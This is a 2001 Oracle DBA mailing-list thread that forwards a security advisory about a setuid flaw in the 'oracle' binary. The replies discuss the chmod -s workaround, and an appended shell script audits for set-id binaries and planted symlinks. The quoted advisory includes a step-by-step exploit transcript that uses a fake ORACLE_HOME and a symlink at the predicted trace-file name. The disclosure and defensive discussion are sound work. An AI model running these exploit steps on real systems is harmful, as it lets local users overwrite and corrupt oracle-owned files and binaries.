
Re: FW: [UNIX] Vulnerability Found In 'oracle' Binary

From: Jared Still <jkstill_at_cybcon.com>
Date: Sun, 12 Aug 2001 13:43:59 -0700
Message-ID: <F001.0036878C.20010812133549@fatcity.com>

Doh! I didn't even consider that.

Via SQL*Net works properly of course.

Jared

On Friday 10 August 2001 18:45, John Kanagaraj wrote:
> Joe,
>
> Don't mind if I switch to size 12 font - my eyes are giving out :)
>
> A small correction - If the suid is taken off 'oracle', only 'oracle' will
> be able to log on *locally*, i.e. if you are using ORACLE_SID and login via
> local SQL*Plus or forms/reports. Other *NIX users will receive an 'unable
> to attach to SHM' error. This is because the non-'oracle' user will not
> have permission either to read/write from SHM or the datafiles. They can do
> so only when assuming the privs via SUID on the 'oracle' binary. When
> connecting via SQL*Net, the listener starts up all processes under the
> 'oracle' and thus assume all privs, so any user can connect via SQL*Net. To
> connect locally without errors in this case, set TWO_TASK rather than
> ORACLE_SID.
>
> Hope that clarifies!
> John Kanagaraj
> Oracle Applications DBA
> DB Soft Inc
> Work : (408) 970 7002
>
> Listen to great, commercial-free christian music 24x7x365 at
> http://www.klove.com
>
> ** The opinions and facts contained in this message are entirely mine and
> do not reflect those of my employer or customers **
>
>
>
>
> -----Original Message-----
> Sent: Friday, August 10, 2001 12:26 PM
> To: Multiple recipients of list ORACLE-L
>
>
>
> problem is if you take off the suid but only oracle will be able to log on if
> I remember correctly.
>
> joe
>
> >>> lerobe_at_acxiom.co.uk 08/10/01 12:50PM >>>
>
> Anyone come across this before ??
>
> Lee
>
> > The following security advisory is sent to the securiteam mailing list,
> > and can be found at the SecuriTeam web site: http://www.securiteam.com
>
> > Vulnerability Found In 'oracle' Binary
> > ------------------------------------------------------------------------
> >
> >
> > SUMMARY
> > There is a write permission checking error in the 'oracle' binary that
> > can be used by local users to overwrite any file owned by the oracle
> > user. This would allow a local user to corrupt database files, overwrite
> > existing oracle binaries, etc.
> > DETAILS
> > Vulnerable systems:
> > Oracle version 8.0.5 up to version 8.1.6
> > Temporary solution:
> > Remove the setuid oracle off the oracle binary:
> > # chmod -s oracle
> > Exploit:
> > $ cd /tmp
> > $ mkdir rdbms
> > $ cd rdbms/
> > $ mkdir log
> > $ cd log
> > $
> > $ ls -alc
> > total 8
> > drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
> > drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
> > $ export ORACLE_HOME=/tmp
> > $ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ ls -alc
> > total 12
> > drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
> > drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
> > -rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc
> >
> > $ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ $REAL_ORACLE_HOME/bin/oracle
> >
> >

-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Jared Still
  INET: jkstill_at_cybcon.com

Received on Sun Aug 12 2001 - 15:43:59 CDT
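
An added example, not part of the original thread or of any Oracle tooling: a POSIX shell audit that confirms the `chmod -s` workaround has taken effect in a binary directory and flags symlinks sitting at the `rdbms/log/ora_*.trc` trace-file location shown in the quoted advisory. The function names and the directories passed in are assumptions chosen for illustration, and the symlink scan is a point-in-time check of whatever directory tree you give it.

```shell
#!/bin/sh
# Added example, not from the original thread. Directory arguments are
# supplied by the caller; the ora_*.trc and rdbms/log names come from the
# quoted advisory's transcript.

# has_setid FILE: succeed if FILE still carries the setuid or setgid bit.
has_setid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# list_setid DIR: print regular files under DIR with setuid or setgid set.
list_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# list_trace_symlinks ROOT: print "link -> target" for symlinks under ROOT
# that sit where the binary would write a trace file (rdbms/log/ora_*.trc).
list_trace_symlinks() {
    find "$1" -type l -path '*/rdbms/log/ora_*.trc' -print |
    while IFS= read -r link; do
        printf '%s -> %s\n' "$link" "$(readlink "$link")"
    done
}

# audit BIN_DIR SCAN_ROOT: report findings; return 0 only when there are none.
audit() {
    setid=$(list_setid "$1")
    links=$(list_trace_symlinks "$2")
    if [ -n "$setid" ]; then
        printf '%s\n' "$setid" | sed 's/^/set-id binary: /'
    fi
    if [ -n "$links" ]; then
        printf '%s\n' "$links" | sed 's/^/trace-name symlink: /'
    fi
    [ -z "$setid" ] && [ -z "$links" ]
}

# Example: audit "$ORACLE_HOME/bin" /tmp
```

Keep in mind the trade-off described in the thread: with the set-id bit removed, local connections by users other than 'oracle' fail, and those users connect through SQL*Net (TWO_TASK) instead.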
